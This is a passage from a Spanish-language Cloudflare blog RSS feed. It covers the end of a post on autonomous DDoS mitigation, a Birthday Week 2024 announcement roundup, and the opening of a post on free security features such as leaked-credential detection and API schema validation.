tráfico de ataque. </p><p>dosd realiza la detección y la mitigación de los ataques a nivel de servidor, a nivel de centro de datos y a nivel global, y todo ello definido por el software. Por esta razón, nuestra red es extremadamente resistente y ofrece una mitigación casi instantánea. No hay "centros de depuración" o "dispositivos de depuración" fuera de ruta. En su lugar, cada servidor ejecuta la pila completa del conjunto de productos de Cloudflare, incluido el componente de detección y mitigación de DDoS. Todo se hace de forma autónoma. Cada servidor también realiza la <i>transmisión (multidifusión)</i> de las instrucciones de mitigación dentro de un centro de datos entre servidores, y globalmente entre centros de datos. Esto garantiza que, ya sea un ataque localizado o distribuido globalmente, dosd ya habrá instalado reglas de mitigación en línea para garantizar una mitigación eficaz.</p>
    <div>
      <h2>Protección eficaz contra los ataques de gran envergadura</h2>
      <a href="#proteccion-eficaz-contra-los-ataques-de-gran-envergadura">
        
      </a>
    </div>
    <p>Nuestros sistemas de detección y mitigación de DDoS, autónomos y definidos por software, se ejecutan en toda nuestra red. En esta publicación nos hemos centrado principalmente en nuestras capacidades de huellas digitales dinámicas, pero nuestros recursos de protección van mucho más allá. El sistema de <a href="https://developers.cloudflare.com/ddos-protection/tcp-protection/"><u>protección TCP avanzada</u></a> y el sistema de <a href="https://developers.cloudflare.com/ddos-protection/dns-protection/"><u>protección DNS avanzada</u></a> funcionan junto con nuestra huella digital dinámica para identificar los ataques DDoS sofisticados y altamente aleatorios basados en TCP y también aprovechan el análisis estadístico para impedir los ataques DDoS complejos basados en DNS. Nuestras soluciones de protección también incorporan información sobre amenazas en tiempo real, perfiles de tráfico y clasificación de aprendizaje automático como parte de nuestra <a href="https://developers.cloudflare.com/ddos-protection/managed-rulesets/adaptive-protection/"><u>protección adaptable contra DDoS</u></a> para la mitigación de las anomalías de tráfico. </p><p>Combinados, estos sistemas, junto con toda la cartera de soluciones de seguridad de Cloudflare, se han desarrollado sobre la red de Cloudflare, una de las redes más grandes del mundo, para garantizar la protección de nuestros clientes contra los mayores ataques del mundo.</p> ]]></content:encoded>
            <category><![CDATA[DDoS]]></category>
            <category><![CDATA[Ataques]]></category>
            <category><![CDATA[Tendencias]]></category>
            <category><![CDATA[Seguridad]]></category>
            <guid isPermaLink="false">4j6QWqeVFn6qzs0Md0LK7h</guid>
            <dc:creator>Manish Arora</dc:creator>
            <dc:creator>Shawn Bohrer</dc:creator>
            <dc:creator>Omer Yoachimik</dc:creator>
            <dc:creator>Cody Doucette</dc:creator>
            <dc:creator>Alex Forster</dc:creator>
            <dc:creator>Nick Wood</dc:creator>
        </item>
        <item>
            <title><![CDATA[Otra Semana aniversario ha llegado a su fin]]></title>
            <link>https://blog.cloudflare.com/es-es/birthday-week-2024-wrap-up/</link>
            <pubDate>Mon, 30 Sep 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Repasamos todos los importantes anuncios realizados durante la Semana aniversario de 2024. ]]></description>
            <content:encoded><![CDATA[ <p>2024 marca el 14.º aniversario de Cloudflare. Cada año, la Semana aniversario está repleta de importantes anuncios y del lanzamiento de nuevas soluciones innovadoras, todo ello con el objetivo de retribuir a nuestros clientes y a la comunidad de Internet en general. En Cloudflare, la Semana aniversario ya forma parte de nuestra cultura y es una tradición de la que nos sentimos orgullosos, no solo para seguir fieles a nuestra misión, sino para estar siempre cerca de nuestros clientes. Comenzamos a planificar esta semana de celebración a principios de año e invitamos a todos en Cloudflare a participar. </p><p>Meses antes de la Semana aniversario, invitamos a los equipos a enviar sus ideas sobre posibles anuncios. Recibimos una avalancha de propuestas, que iban desde la implementación de nuevos estándares hasta la creación de nuevos productos para desarrolladores. Nuestro mayor desafío es dar cabida a este aluvión de ideas en apenas una semana. Todavía nos queda mucho por desarrollar. Por suerte, celebramos nuestro aniversario cada año. ¡Aunque es posible que necesitemos que la Semana aniversario del año que viene tenga un día más!</p><p>Por si te lo has perdido, aquí tienes todo lo que anunciamos durante la Semana aniversario de 2024:</p>
    <div>
      <h3>LUNES</h3>
      <a href="#lunes">
        
      </a>
    </div>
    <div>
    <figure>
        <table>
            <colgroup>
                <col></col>
                <col></col>
            </colgroup>
            <tbody>
                 <tr>
    <th><span>QUÉ</span></th>
    <th><span>En pocas palabras...</span></th>
  </tr>
</tbody><tbody>
  <tr>
    <td><a href="https://blog.cloudflare.com/cloudflare-ai-audit-control-ai-content-crawlers"><span>Empieza a verificar y controlar los modelos de IA que acceden a tus contenidos</span></a></td>
    <td><span>Entiende qué bots y rastreadores relacionados con la IA pueden acceder a tu sitio web y qué contenido decides permitirles consumir.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/batched-dns-changes/"><span>Mejoramos la eficiencia de la gestión de zonas con actualizaciones de registros DNS por lotes</span></a></td>
    <td><span>Los clientes que utilizan Cloudflare para gestionar el DNS pueden crear un conjunto completo de registros, activar el </span><a href="https://developers.cloudflare.com/dns/manage-dns-records/reference/proxied-dns-records/"><span>redireccionamiento mediante proxy</span></a><span> en muchos registros, actualizar muchos registros para que apunten a un nuevo objetivo al mismo tiempo, o incluso eliminar todos sus registros.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/turnstile-ephemeral-ids-for-fraud-detection"><span>Novedad: Ephemeral ID, una nueva herramienta para la detección del fraude</span></a></td>
    <td><span>Damos un paso más en la mejora de la seguridad con Ephemeral ID, una nueva función que genera un ID único de corta duración, sin depender de ninguna información a nivel de red.</span></td>
  </tr>
            </tbody>
        </table>
    </figure>
</div>
    <div>
      <h3>MARTES</h3>
      <a href="#martes">
        
      </a>
    </div>
    <div>
    <figure>
        <table>
            <colgroup>
                <col></col>
                <col></col>
            </colgroup>
            <tbody>
                <tr>
    <th><span>Qué</span></th>
    <th><span>En pocas palabras...</span></th>
  </tr>
</tbody><tbody>
  <tr>
    <td><a href="https://blog.cloudflare.com/safer-resolver/"><span>Los socios de Cloudflare ofrecen una experiencia de navegación más segura a los hogares</span></a></td>
    <td><span>Los proveedores de servicios de Internet, de redes y de equipos de hardware pueden </span><a href="https://docs.google.com/spreadsheets/d/1ZIBbVz2gqPBsldhszk_Wo2eZeNwAZ5Mf9xSssxRrTuc/edit?resourcekey=&amp;gid=386353769#gid=386353769"><span>registrarse</span></a><span> y asociarse con Cloudflare para ofrecer una experiencia de navegación más segura a los hogares.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/a-safer-internet-with-cloudflare/"><span>Mayor seguridad en Internet con Cloudflare: información sobre amenazas, análisis y nuevas detecciones de amenazas, sin coste</span></a></td>
    <td><span>Información sobre amenazas, análisis, nuevo servicio de detección de amenazas y mucho más, de forma gratuita.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/automatically-generating-cloudflares-terraform-provider/"><span>Generación automática del proveedor Terraform de Cloudflare</span></a></td>
    <td><span>Los últimos componentes del ecosistema de esquemas OpenAPI que ahora se generan automáticamente: el proveedor Terraform y la documentación de referencia de la API.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/key-transparency/"><span>Cloudflare ayuda a verificar la seguridad de los mensajes cifrados de extremo a extremo mediante auditorías de transparencia de claves para WhatsApp</span></a></td>
    <td><span>Cloudflare ayuda a verificar la seguridad de los mensajes cifrados de extremo a extremo mediante auditorías de transparencia de claves para WhatsApp.</span></td>
  </tr>
            </tbody>
        </table>
    </figure>
</div>
    <div>
      <h3>MIÉRCOLES</h3>
      <a href="#miercoles">
        
      </a>
    </div>
    <div>
    <figure>
        <table>
            <colgroup>
                <col></col>
                <col></col>
            </colgroup>
            <tbody>
                <tr>
    <th><span>QUÉ</span></th>
    <th><span>En pocas palabras...</span></th>
  </tr>
</tbody><tbody>
  <tr>
    <td><a href="https://blog.cloudflare.com/introducing-speed-brain/"><span>Speed Brain: ayudamos a que las páginas web se carguen un 45 % más rápido</span></a></td>
    <td><span>Speed Brain, nuestro último avance en velocidad, utiliza la API Speculation Rules para la captación previa del contenido para las próximas navegaciones probables de los usuarios, descargando las páginas web antes de que los usuarios accedan a ellas y acelerando un 45 % la carga de las páginas.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/instant-purge/"><span>Depuración instantánea: invalida el contenido almacenado en caché en menos de 150 ms.</span></a></td>
    <td><span>La función de depuración instantánea invalida el contenido almacenado en caché en menos de 150 ms, ofreciendo la depuración de caché más rápida del sector con latencia global para las depuraciones por etiquetas, nombres de host y prefijos.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/new-standards/"><span>Nuevos estándares para mejorar la velocidad y la privacidad de Internet</span></a></td>
    <td><span>Compresión Zstandard, Encrypted Client Hello y más anuncios relacionados con la velocidad y la privacidad, todo ello de forma gratuita.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/webrtc-turn-using-anycast/"><span>TURN y Anycast: conexiones punto a punto que funcionan a nivel global</span></a></td>
    <td><span>A partir de hoy, el </span><a href="https://developers.cloudflare.com/calls/turn/"><span>servicio TURN de Cloudflare Calls</span></a><span> está disponible de forma general para todas las cuentas de Cloudflare.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/gen-12-servers"><span>12ª generación de servidores de Cloudflare, un 145 % más eficaces y un 63 % más eficientes</span></a></td>
    <td><span>Servidores de última generación para ofrecer un rendimiento y una seguridad excepcionales, compatibilidad mejorada para cargas de trabajo de IA/aprendizaje automático y avances significativos en la eficiencia energética.</span><br /><span> </span></td>
  </tr>
            </tbody>
        </table>
    </figure>
</div>
    <div>
      <h3>JUEVES</h3>
      <a href="#jueves">
        
      </a>
    </div>
    <div>
    <figure>
        <table>
            <colgroup>
                <col></col>
                <col></col>
            </colgroup>
            <tbody>
                <tr>
    <th><span>QUÉ</span></th>
    <th><span>En pocas palabras...</span></th>
  </tr>
</tbody><tbody>
  <tr>
    <td><a href="https://blog.cloudflare.com/startup-program-250k-credits"><span>Revisión del Programa para startups: crea y desarrolla en Cloudflare con hasta 250 000 dólares en créditos</span></a></td>
    <td><span>Las empresas emergentes que cumplan los requisitos ya pueden solicitar recibir hasta 250 000 USD en créditos para desarrollar con la plataforma para desarrolladores de Cloudflare.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/workers-ai-bigger-better-faster"><span>La plataforma de inteligencia artificial más grande, más eficaz y más rápida de Cloudflare </span></a></td>
    <td><span>GPU más potentes, mayor compatibilidad con modelos, servicios mejorados de registro y evaluación en AI Gateway, y Vectorize GA con índices más grandes y consultas más rápidas.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/builder-day-2024-announcements"><span>Builder Day 2024: Incorporamos 18 actualizaciones a la plataforma Workers</span></a></td>
    <td><span>Registros de Workers persistentes y consultables, disponibilidad general de la compatibilidad con Node.js, compatibilidad mejorada con Next.js a través de OpenNext, CI/CD integrado para Workers, implementaciones graduales, Queues, disponibilidad general de las notificaciones de eventos de R2, y mucho más, lo que facilita, agiliza y hace más asequible el desarrollo en Cloudflare.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/faster-workers-kv"><span>Workers KV más rápido</span></a></td>
    <td><span>Descubre cómo hemos triplicado la velocidad de Workers KV.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/sqlite-in-durable-objects"><span>Almacenamiento SQL sin latencia en cada Durable Object</span></a></td>
    <td><span>Ahora el código de tu aplicación está en la capa de almacenamiento, así que tu código se ejecuta allí donde se almacenan los datos.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/making-workers-ai-faster/"><span>Workers AI, ahora más rápida y eficiente | Optimización del rendimiento con compresión de caché de KV y decodificación especulativa</span></a></td>
    <td><span>Gracias a nuevas técnicas de optimización, como la compresión de caché de KV y la decodificación especulativa, ahora la inferencia de modelos lingüísticos de gran tamaño (LLM) es ultrarrápida en la plataforma de Cloudflare Workers AI.</span></td>
  </tr>
            </tbody>
        </table>
    </figure>
</div>
    <div>
      <h3>VIERNES</h3>
      <a href="#viernes">
        
      </a>
    </div>
    <div>
    <figure>
        <table>
            <colgroup>
                <col></col>
                <col></col>
            </colgroup>
            <tbody>
                <tr>
    <th><span>Qué</span></th>
    <th><span>En pocas palabras...</span></th>
  </tr>
</tbody><tbody>
  <tr>
    <td><a href="https://blog.cloudflare.com/container-platform-preview"><span>Nuestra plataforma de contenedores está en producción. Tiene GPU. Aquí tienes un adelanto.</span></a></td>
    <td><span>Hemos estado trabajando en algo nuevo, una plataforma para ejecutar contenedores en la red de Cloudflare. Ya la usamos en producción, para la inferencia de IA y mucho más.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/cisa-pledge-commitment-bug-bounty-vip"><span>Avances en ciberseguridad: Cloudflare implementa un nuevo programa VIP de recompensas por errores como parte del compromiso CISA, Secure by Design.</span></a></td>
    <td><span>Este año hemos implementado un nuevo programa VIP de recompensas por errores como parte de nuestro compromiso CISA Pledge.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/launchpad-cohort4-dev-starter-pack/"><span>Potenciamos el trabajo de los desarrolladores: presentamos el grupo n.° 4 de Dev Alliance y Workers Launchpad</span></a></td>
    <td><span>Consigue acceso gratuito y con descuento a las herramientas esenciales para desarrolladores y conoce el último grupo de increíbles startups que desarrollan en Cloudflare.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/expanding-our-support-for-oss-projects-with-project-alexandria"><span>Proyecto Alexandria: mayor soporte de los proyectos de código abierto</span></a></td>
    <td><span>Ampliamos nuestro programa de código abierto y contribuimos al futuro sostenible y escalable de los proyectos, proporcionándoles las herramientas y la protección que necesitan para prosperar.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/radar-data-explorer-ai-assistant"><span>Tendencias de red y lenguaje natural: nuevo Log Explorer y asistente de inteligencia artificial de Cloudflare Radar</span></a></td>
    <td><span>Una sencilla interfaz basada en la web para crear consultas API más complejas, como comparaciones y filtros, y visualizar los resultados.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/bringing-ai-to-cloudflare"><span>AI Everywhere con el asistente de creación de reglas WAF, información IA de Cloudflare Radar y protección contra bots de IA actualizada</span></a></td>
    <td><span>Ampliamos nuestras funciones de AI Assistant para ayudarte a crear nuevas reglas del WAF, ahora Radar cuenta con nueva información sobre el tráfico de bots y rastreadores de IA, así como nuevas funciones de bloqueo de bots de IA.</span></td>
  </tr>
  <tr>
    <td><a href="https://blog.cloudflare.com/cloudflares-commitment-to-free"><span>Reafirmamos nuestro compromiso con los servicios gratuitos</span></a></td>
    <td><span>Nuestro plan gratuito está aquí para quedarse, y esta semana reafirmamos ese compromiso con 15 lanzamientos que lo mejoran aún más.</span></td>
  </tr>
            </tbody>
        </table>
    </figure>
</div>
    <div>
      <h2>Una cosa más...</h2>
      <a href="#una-cosa-mas">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5FReOqd5AHo8vTgSmY6qe6/1ae02d93ec9d9af2f60c0b6024017f58/image3.png" />
          </figure><p>Cloudflare presta servicio a millones de clientes y a sus millones de dominios en casi todos los países del mundo. Sin embargo, como empresa global, el panorama de los pagos puede ser complejo, especialmente en regiones fuera de Norteamérica. Aunque las tarjetas de crédito son muy populares para las compras en línea en Estados Unidos, el panorama global es bastante diferente. <a href="https://www.fisglobal.com/-/media/fisglobal/files/campaigns/global-payments%20report/FIS_TheGlobalPaymentsReport_2023.pdf"><u>El 60 % de los consumidores de Europa, Oriente Medio y África, así como de Asia-Pacífico y Latinoamérica, eligen métodos de pago alternativos</u></a>. Por ejemplo, los consumidores europeos suelen optar por el débito directo SEPA, un mecanismo de transferencia bancaria, mientras que los consumidores chinos suelen utilizar Alipay, un monedero digital.</p><p>En Cloudflare, consideramos esto una oportunidad para ir allí dondequiera que se encuentren los clientes. Hoy, nos complace anunciar que estamos ampliando nuestro sistema de pago y lanzando una versión beta cerrada de un nuevo método de pago llamado <a href="https://www.cloudflare.com/lp/cloudflare-introduces-stripe-link/"><u>Stripe Link</u></a>. La experiencia de pago será más rápida y fluida, lo que permitirá a nuestros clientes de autoservicio pagar con cuentas bancarias o tarjetas guardadas con Link. Los clientes que hayan guardado sus datos de pago en cualquier empresa que utilice Link pueden pagar rápidamente sin tener que volver a especificar su información de pago.  </p><p>Estos son los primeros pasos en nuestros esfuerzos por ampliar nuestro sistema de pago para dar soporte los métodos de pago globales utilizados por clientes de todo el mundo. Iremos implementando nuevos métodos de pago gradualmente, garantizando una integración fluida y recopilando los comentarios de nuestros clientes en cada paso del proceso. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/v0v7QBRWeGSfArq6jE5eg/7d8d79cbfe3f63386db52469c4727d21/image2.png" />
          </figure>
    <div>
      <h2>Hasta el año que viene</h2>
      <a href="#hasta-el-ano-que-viene">
        
      </a>
    </div>
    <p>Esto es todo por lo que respecta a la Semana aniversario 2024. Sin embargo, la innovación nunca se detiene en Cloudflare. Sigue el <a href="https://blog.cloudflare.com/"><u>blog de Cloudflare</u></a> durante todo el año para estar al día de nuestros lanzamientos de más productos y funciones que ayudan a mejorar Internet.</p> ]]></content:encoded>
            <category><![CDATA[Semana aniversario]]></category>
            <category><![CDATA[Socios]]></category>
            <category><![CDATA[Plataforma para desarrolladores]]></category>
            <category><![CDATA[Workers Launchpad]]></category>
            <category><![CDATA[Workers AI]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Turnstile]]></category>
            <category><![CDATA[Rendimiento]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[Cache]]></category>
            <category><![CDATA[Velocidad]]></category>
            <category><![CDATA[Speed Brain]]></category>
            <category><![CDATA[Desarrolladores]]></category>
            <category><![CDATA[AI]]></category>
            <guid isPermaLink="false">65JnLP0MYKVzwTyOsItRJk</guid>
            <dc:creator>Kelly May Johnston</dc:creator>
            <dc:creator>Brendan Irvine-Broque</dc:creator>
        </item>
        <item>
            <title><![CDATA[Mayor seguridad en Internet con Cloudflare: información sobre amenazas, análisis y nuevas detecciones de amenazas, sin coste]]></title>
            <link>https://blog.cloudflare.com/es-es/a-safer-internet-with-cloudflare/</link>
            <pubDate>Tue, 24 Sep 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Hoy estamos haciendo grandes avances en nuestra misión de ayudar a mejorar Internet. Cloudflare ofrece a todo el mundo acceso gratuito a más de 10 productos y funciones diferentes de seguridad de sitios web y redes. ]]></description>
            <content:encoded><![CDATA[ <p>Es probable que cualquier persona que utilice Internet tenga contacto a diario con la red de Cloudflare, ya sea accediendo a un sitio protegido por Cloudflare, utilizando nuestro <a href="https://1.1.1.1/dns"><u>solucionador 1.1.1.1</u></a> o conectándose a través de una red utilizando nuestros productos Cloudflare One.</p><p>Esto coloca a Cloudflare en una posición de gran responsabilidad para mejorar la seguridad de Internet para miles de millones de usuarios en todo el mundo. Hoy proporcionamos información sobre amenazas y más de 10 nuevas funciones de seguridad de forma gratuita a todos nuestros clientes. Tanto si utilizas Cloudflare para proteger tu sitio web, tu red doméstica o tu oficina, encontrarás algo útil que puedes empezar a utilizar con solo unos clics.</p><p>Estas funciones se centran en algunas de las mayores preocupaciones en materia de ciberseguridad, como los <a href="https://www.cloudflare.com/zero-trust/solutions/account-takeover-prevention/"><u>ataques de apropiación de cuentas</u></a>, los <a href="https://blog.cloudflare.com/tag/supply-chain-attacks/"><u>ataques a la cadena de suministro</u></a>, los <a href="https://www.cloudflare.com/learning/security/api/what-is-api-security/"><u>ataques contra puntos finales de la API</u></a>, la <a href="https://www.cloudflare.com/network-services/products/magic-network-monitoring/"><u>visibilidad de la red</u></a> y las <a href="https://www.cloudflare.com/learning/access-management/what-is-dlp/"><u>fugas de datos de tu red</u></a>.</p>
    <div>
      <h2>Más seguridad para todos</h2>
      <a href="#mas-seguridad-para-todos">
        
      </a>
    </div>
    <p>Puedes leer más sobre cada una de estas funciones en las secciones siguientes, pero queríamos adelantarte un breve resumen.</p><p><b>Si eres un entusiasta de la ciberseguridad</b>: puedes visitar nuestro <a href="http://cloudflare.com/threat-intelligence/"><u>nuevo sitio web de información sobre amenazas de Cloudforce One</u></a> para saber más sobre ciberamenazas, campañas de ataque y otros problemas relacionados con la seguridad en Internet.</p><p><b>Si eres propietario de un sitio web</b>: a partir de hoy, todos los planes gratuitos tendrán acceso a <a href="https://developers.cloudflare.com/waf/analytics/security-analytics/"><u>Análisis de seguridad</u></a> para sus zonas. Además, también <a href="https://developers.cloudflare.com/dns/additional-options/analytics/"><u>Análisis de DNS</u></a> estará disponible a través de GraphQL.</p><p>Una vez que tienes visibilidad, se trata de distinguir el tráfico legítimo del tráfico malicioso. Todos los clientes pueden acceder a los servicios siempre activos de <a href="https://developers.cloudflare.com/waf/managed-rules/check-for-exposed-credentials/"><u>detección de ataques de apropiación de cuentas</u></a>, la <a href="https://developers.cloudflare.com/api-shield/security/schema-validation/"><u>validación de esquemas de las API</u></a> para aplicar un modelo de seguridad positivo en sus puntos finales de la API, y el <a href="https://developers.cloudflare.com/page-shield/detection/monitor-connections-scripts/"><u>supervisor de scripts de Page Shield</u></a> para proporcionar visibilidad de los activos de terceros que cargas desde tu lado y que podrían utilizarse para realizar ataques a la cadena de suministro.</p><p><b>Si utilizas Cloudflare para proteger a tus usuarios y tu red</b>: vamos a agrupar varios de nuestros productos Cloudflare One en una nueva solución gratuita. Este paquete incluirá los <a href="https://www.cloudflare.com/plans/zero-trust-services/"><u>productos Zero Trust actuales que ofrecemos de forma gratuita</u></a> y nuevos productos como <a href="https://www.cloudflare.com/network-services/products/magic-network-monitoring/"><u>Magic Network Monitoring</u></a> para la visibilidad de la red, <a href="https://www.cloudflare.com/learning/access-management/what-is-dlp/"><u>Prevención de pérdida de datos</u></a> para los datos confidenciales y <a href="https://www.cloudflare.com/learning/performance/what-is-digital-experience-monitoring/"><u>Digital Experience Monitoring</u></a> para medir la conectividad y el rendimiento de la red. Cloudflare es el único proveedor que ofrece versiones gratuitas de este tipo de productos.</p><p><b>Si eres un usuario nuevo</b>: tenemos nuevas opciones de autenticación. A partir de hoy, presentamos la opción de utilizar la autenticación de Google para registrarse e iniciar sesión en Cloudflare, lo que facilitará el inicio de sesión para algunos de nuestros clientes y reducirá la dependencia de tener que recordar contraseñas, reduciendo así el riesgo de que su cuenta de Cloudflare se vea comprometida.</p><p>Y ahora con más detalle:</p>
    <div>
      <h2>Información sobre amenazas y análisis</h2>
      <a href="#informacion-sobre-amenazas-y-analisis">
        
      </a>
    </div>
    
    <div>
      <h3>Cloudforce One</h3>
      <a href="#cloudforce-one">
        
      </a>
    </div>
    <p>Nuestro equipo de operaciones e investigación de amenazas, <a href="https://blog.cloudflare.com/es-es/introducing-cloudforce-one-threat-operations-and-threat-research/"><u>Cloudforce One</u></a>, se complace en anunciar el lanzamiento de un <a href="http://cloudflare.com/threat-intelligence/"><u>sitio web dedicado a la información sobre amenazas y de acceso gratuito</u></a>. Utilizaremos este sitio para publicar información técnica y ejecutiva sobre las últimas amenazas y tácticas de los ciberdelincuentes, así como información sobre malware, vulnerabilidades y ataques emergentes.</p><p>También publicamos dos nuevos elementos de datos en la información sobre amenazas, y prometemos más. Visita el <a href="http://cloudflare.com/threat-intelligence/"><u>nuevo sitio web</u></a> aquí para ver las últimas investigaciones, que incluyen un actor persistente alineado con el estado que ataca a organizaciones regionales en el sur y este de Asia, así como el aumento del fraude de transporte de doble intermediación. </p><p><a href="http://cloudflare.com/threat-intelligence/"><u>Suscríbete</u></a> para recibir notificaciones por correo electrónico sobre futuras investigaciones sobre amenazas.</p>
    <div>
      <h3>Análisis de seguridad</h3>
      <a href="#analisis-de-seguridad">
        
      </a>
    </div>
    <p>Análisis de seguridad te ofrece una perspectiva de la seguridad de <b>todo</b> tu tráfico HTTP, no solo de las solicitudes mitigadas, lo que te permite centrarte en lo más importante: el tráfico que se considera malicioso pero que potencialmente no se ha mitigado. Esto significa que, además de utilizar los Eventos de seguridad para ver las medidas de seguridad adoptadas por nuestro conjunto de productos de seguridad para las aplicaciones, puedes utilizar Análisis de seguridad para revisar todo tu tráfico en busca de anomalías o comportamientos extraños y, a continuación, utilizar la información obtenida para elaborar reglas de mitigación precisas. en función de tus patrones de tráfico específicos. A partir de hoy, ponemos esta perspectiva a disposición de los clientes en todos nuestros planes. 

Los usuarios de los planes gratuito y Pro ahora tendrán acceso a <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/analytics"><u>un nuevo panel de control</u></a> de Análisis de seguridad, donde tendrás una visión general de tu tráfico en el gráfico de análisis de tráfico, y podrás agrupar y filtrar para concentrarte fácilmente en las anomalías. También puedes ver las principales estadísticas y filtrar por diversas dimensiones, como países, navegadores de origen, sistemas operativos de origen, versiones HTTP, versión del protocolo SSL, estado de la caché y acciones de seguridad.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7oBM7D78NDErNNgIPRSJN9/055440bfd256bb2f128d5d99858a5748/image6.jpg" />
          </figure>
    <div>
      <h3>Análisis de DNS</h3>
      <a href="#analisis-de-dns">
        
      </a>
    </div>
    <p>Todos los usuarios de Cloudflare ahora tienen acceso al <a href="https://dash.cloudflare.com/?to=/:account/:zone/dns/analytics"><u>nuevo y mejorado panel de control de Análisis de DNS</u></a>, así como al nuevo conjunto de datos de Análisis de DNS en nuestra <a href="https://developers.cloudflare.com/analytics/graphql-api/"><u>eficaz API GraphQL</u></a>. Ahora puedes analizar fácilmente las consultas DNS enviadas a tus dominios, lo que te puede ayudar a solucionar problemas, detectar patrones y tendencias, o generar informes de uso aplicando filtros eficaces y desglosando las consultas DNS por origen.

Con el <a href="https://blog.cloudflare.com/es-es/foundation-dns-launch"><u>lanzamiento de Foundation DNS</u></a>, presentamos una nueva función Análisis de DNS basados en GraphQL. Anteriormente estos análisis solo estaban disponibles para las zonas que utilizaban <a href="https://developers.cloudflare.com/dns/foundation-dns/advanced-nameservers/"><u>servidores de nombres avanzados</u></a>. Sin embargo, debido a la información detallada que proporcionan estos análisis, consideramos que esta función era algo que debíamos poner a disposición de todos los usuarios. A partir de hoy, se puede acceder a la nueva función Análisis de DNS basados en GraphQL en todas las zonas que utilicen el servicio de DNS autoritativo de Cloudflare en Análisis en la sección DNS.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3LJ4aIFB4pHhHtWeWzYlgV/96c701d7c826a92e1220c7cd85f40f88/image5.png" />
          </figure>
    <div>
      <h2>Detección y mitigación de amenazas a las aplicaciones</h2>
      <a href="#deteccion-y-mitigacion-de-amenazas-a-las-aplicaciones">
        
      </a>
    </div>
    
    <div>
      <h3>Detección de la apropiación de cuentas</h3>
      <a href="#deteccion-de-la-apropiacion-de-cuentas">
        
      </a>
    </div>
    <p><a href="https://techreport.com/statistics/cybersecurity/password-reuse-statistics/"><u>El 65 % de los usuarios de Internet</u></a> son vulnerables a la apropiación de cuentas debido a la reutilización de contraseñas y a la creciente frecuencia de grandes fugas de datos. Ayudar a mejorar Internet implica hacer que la protección de cuentas críticas sea fácil y accesible para todos los usuarios.</p><p>A partir de hoy, proporcionamos una sólida seguridad para las cuentas que ayuda a prevenir el relleno de credenciales y otros ataques de apropiación de cuentas, a todo el mundo de forma gratuita, ya sean usuarios individuales o grandes empresas, ofreciendo gratis funciones mejoradas como las comprobaciones de credenciales filtradas y las detecciones de apropiación de cuentas. </p><p>Estas actualizaciones incluyen la detección automática de inicios de sesión y la prevención de intentos de descifrar una contraseña por fuerza bruta con una configuración mínima, así como el acceso a una base de datos integral de credenciales filtradas de más de 15 000 millones de contraseñas que contendrá las contraseñas filtradas del servicio <a href="https://haveibeenpwned.com/"><u>Have I been Pwned (HIBP)</u></a> además de nuestra propia base de datos. Los clientes pueden tomar medidas respecto a las solicitudes de credenciales filtradas mediante las funciones que ofrece el WAF de Cloudflare, como las <a href="https://developers.cloudflare.com/waf/rate-limiting-rules"><u>reglas de limitación de velocidad</u></a> y las <a href="https://developers.cloudflare.com/waf/custom-rules/"><u>reglas personalizadas</u></a>, o pueden tomar medidas sobre el origen aplicando <a href="https://www.cloudflare.com/learning/access-management/what-is-multi-factor-authentication/"><u>la autenticación en varias fases</u></a> o solicitando un restablecimiento de contraseña basado en un encabezado enviado al origen.</p><p>La configuración es sencilla: los usuarios del plan gratuito obtienen detecciones automáticas, mientras que los usuarios de pago pueden activar las nuevas funciones con un solo clic en el panel de control de Cloudflare. Para obtener más información sobre la instalación y la configuración, consulta nuestra <a href="https://developers.cloudflare.com/waf/detections/leaked-credentials/"><u>documentación</u></a> y utilízala hoy mismo.</p>
    <div>
      <h3>Validación de esquemas de las API</h3>
      <a href="#validacion-de-esquemas-de-las-api">
        
      </a>
    </div>
    <p>El tráfico de API <a href="https://www.cloudflare.com/2024-api-security-management-report/"><u>comprende más de la mitad</u></a> del tráfico dinámico en la red de Cloudflare. La popularidad de las API ha abierto un nuevo <a href="https://cyware.com/news/unprotected-database-belonging-to-justdial-exposes-personal-information-of-almost-100-million-users-1d5bb7a9"><u>conjunto</u></a> de <a href="https://venturebeat.com/security/t-mobile-data-breach-shows-api-security-cant-be-ignored/"><u>vectores de</u></a> <a href="https://venturebeat.com/security/twitter-breach-api-attack/"><u>ataque</u></a>. La <a href="https://developers.cloudflare.com/api-shield/security/schema-validation/"><u>validación de esquemas</u></a> de Cloudflare API Shield es el primer paso para <a href="https://blog.cloudflare.com/es-es/api-gateway/"><u>reforzar</u></a> la seguridad de tus API frente a estas nuevas amenazas. </p><p>Ahora, por primera vez, <i>cualquier</i> cliente de Cloudflare puede utilizar la validación de esquemas para garantizar que solo las solicitudes válidas enviadas a su API lleguen a su origen.</p><p>Esta funcionalidad impide la 